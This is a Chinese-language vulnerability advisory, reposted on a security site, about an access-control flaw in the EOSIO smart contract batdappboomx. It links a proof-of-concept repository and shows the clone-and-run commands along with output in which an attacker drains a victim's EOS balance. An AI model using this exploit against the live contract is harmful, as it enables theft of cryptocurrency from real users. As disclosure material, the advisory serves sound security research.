【高】batdappboomx 智能合约访问控制漏洞

admin 2022年5月16日00:48:26安全漏洞评论11 views1172字阅读3分54秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

×


01
 漏洞描述


batdappboomx是运行在EOSIO 区块链中的公共智能合约。如果参与者之前支付了一些加密货币,则该智能合约会向其参与者奖励加密货币。


×


02
漏洞状态

# 漏洞状态 描述
1 漏洞细节
2 漏洞类型 访问控制
3 漏洞等级
4 野外利用 未知
5 EXP 未知
6 POC 未知


×


03
漏洞引用


  • https://github.com/Kenun99/CVE-batdappboomx


×


04
旧的漏洞



×


05
影响版本


  • 此智能合约的最新版本。智能合约的 sha256 哈希码为 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 在区块链浏览器https://bloks.io/account/batdappboomx中查看。


×


06
漏洞分析


batdappboomx不是开源的,但我们发现了WASAI的一个漏洞。攻击者无需支付任何费用即可加入此游戏。


激活环境

git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomxdocker build -t localhost/client-eos:eos .docker run --rm  --network host -it localhost/client-eos:eos

攻击受害者并窃取其加密货币,即EOS

info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]...warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.walletCreating wallet: defaultSave password to use in the future to unlock this wallet.Without password imported keys will not be retrievable.saving password to /root/passwdimported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV[+] victim's balance: 100.00 -> 0.00[+] attacker's balance: 10000000.00 10000100.00
[+] Attacked successfully. Got more cryptocurrency.

【高】batdappboomx 智能合约访问控制漏洞

原文始发于微信公众号(Ots安全):【高】batdappboomx 智能合约访问控制漏洞

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月16日00:48:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【高】batdappboomx 智能合约访问控制漏洞 http://cn-sec.com/archives/1007628.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: